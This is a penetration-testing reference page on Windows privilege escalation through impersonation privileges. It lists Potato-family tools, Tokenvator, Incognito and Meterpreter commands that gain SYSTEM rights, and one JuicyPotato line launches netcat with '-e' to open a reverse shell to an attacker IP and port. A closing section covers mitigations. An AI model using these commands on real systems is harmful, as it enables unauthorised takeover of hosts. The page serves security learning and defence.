EoP - Impersonation Privileges

Impersonation privileges in Windows systems allow processes or users to assume the identity of another user. This capability can be exploited for privilege escalation (EoP), enabling attackers to execute code with higher privileges, often leading to complete control over the system. Below, we outline key impersonation privileges, tools, execution paths, and related remarks to help security professionals understand and mitigate these threats.

Privilege

Impact

Tool

Execution Path

Remarks

SeAssignPrimaryToken

Admin

3rd Party Tool

potato.exe, rottenpotato.exe, juicypotato.exe

Allows users to impersonate tokens, escalating privileges to NT AUTHORITY\SYSTEM. Useful for reading memory dumps (%WINDIR%\MEMORY.DMP).

SeBackupPrivilege

SeBackup

Built-in Commands

robocopy /b

Enables reading of sensitive files, especially useful for accessing open files. Requires both SeBackup and SeRestore.

SeCreateToken

Admin

3rd Party Tool

NtCreateToken

Creates arbitrary tokens, potentially granting local admin rights.

SeDebugPrivilege

Admin

PowerShell

Duplicate lsass.exe token

Allows duplicating the LSASS token to escalate privileges. A script can be found on FuzzySecurity.

SeLoadDriver

Admin

3rd Party Tool

Load buggy drivers like szkg64.sys, capcom.sys

Exploits driver vulnerabilities to gain elevated privileges. The szkg64 vulnerability is listed as CVE-2018-15732.

SeRestorePrivilege

Admin

PowerShell

Enable-SeRestorePrivilege

Allows renaming system binaries, e.g., renaming utilman.exe to cmd.exe. Can trigger AV detections.

SeTakeOwnership

Admin

Built-in Commands

takeown.exe

Take ownership of files/directories, allowing modification of critical system files.

SeTcbPrivilege

Admin

3rd Party Tool

Token manipulation

Allows manipulation of tokens to include local admin rights. May require SeImpersonate.

Impersonation Privileges and Exploitation Techniques in Windows

Overview

Windows impersonation privileges allow processes or users to assume the identity of another user, which is often exploited to achieve Elevation of Privilege (EoP). Attackers leverage these privileges to execute code with NT AUTHORITY\SYSTEM rights, gaining full control of the system. Below is a detailed outline of impersonation tools, techniques, and mitigation strategies.

Key Impersonation Privileges

  1. SeImpersonatePrivilege: Allows a process to impersonate a client after authentication.

  2. SeAssignPrimaryTokenPrivilege: Enables assigning a primary token to a new process, useful for impersonating SYSTEM.

Impersonation Tools and Techniques

1. Potato Variants

RottenPotato

  • Description: Exploits SeAssignPrimaryToken to impersonate NT AUTHORITY\SYSTEM.

  • Source: Foxglove Security | BreenMachine

  • Usage:

    rot.exe -Hc
impersonate_token "NT AUTHORITY\SYSTEM"

JuicyPotato

  • Description: Uses COM object abuse to escalate privileges with SeImpersonate or SeAssignPrimaryToken.

  • Source: Juicy-Potato

  • Usage:

    JuicyPotato.exe -l 9999 -p "C:\interpub\wwwroot\upload\nc.exe" -a "IP PORT -e"

2. RoguePotato

  • Description: Exploits a fake OXID resolver to perform SYSTEM impersonation.

  • Source: RoguePotato

  • Usage:

    RoguePotato.exe -l 9999 -c "C:\windows\system32\cmd.exe"

3. EFSPotato

  • Description: Utilizes EFS RPC (Encrypting File System Remote Procedure Call) for privilege escalation.

  • Source: MS-EFSR

  • Compilation:

    csc EfsPotato.cs

Using Meterpreter for Privilege Escalation

Meterpreter provides built-in commands for privilege escalation.

  • Command to Get SYSTEM Privileges:

    meterpreter> getsystem

Alternative Tools

1. Tokenvator

  • Description: Exploits impersonation and token manipulation to escalate privileges.

  • Usage:

    Tokenvator.exe getsystem cmd.exe

2. Incognito

  • Description: Facilitates token manipulation to execute commands as NT AUTHORITY\SYSTEM.

  • Usage:

    incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe

Potential Risks

  • Full System Control: Successful exploitation grants complete control over system resources.

  • Data Exfiltration: Access to sensitive data, including system hives, user credentials, and protected files.

  • Persistence: Attackers can establish backdoors or scheduled tasks under SYSTEM privileges.

  • Service Manipulation: Modify, disable, or create system services.

Mitigation Strategies

1. Limit Privileges

  • Restrict SeImpersonate and SeAssignPrimaryToken privileges to only essential services.

  • Regularly audit accounts and processes with these privileges.

2. Monitor Impersonation Activity

  • Enable advanced auditing for token manipulation and privilege usage.

  • Use Sysmon to monitor and log suspicious process behaviors involving impersonation tools.

3. Implement Application Whitelisting

  • Use AppLocker or Windows Defender Application Control (WDAC) to block unauthorized binaries, including impersonation tools.

4. Regular Patching and Updates

  • Keep Windows and related services updated to address known vulnerabilities exploited by tools like JuicyPotato and RoguePotato.

5. Endpoint Detection and Response (EDR)

  • Deploy EDR solutions to detect exploitation attempts involving impersonation tools.

  • Monitor for abnormal usage patterns of legitimate binaries (e.g., cmd.exe, powershell.exe).

Conclusion

Impersonation privileges provide attackers with a powerful means of achieving privilege escalation. Security professionals must understand the tools and techniques used in impersonation attacks and apply robust mitigation strategies to safeguard their environments.

PreviousEoP - Living Off The Land Binaries and ScriptsNextEoP - Privileged File Write

Last updated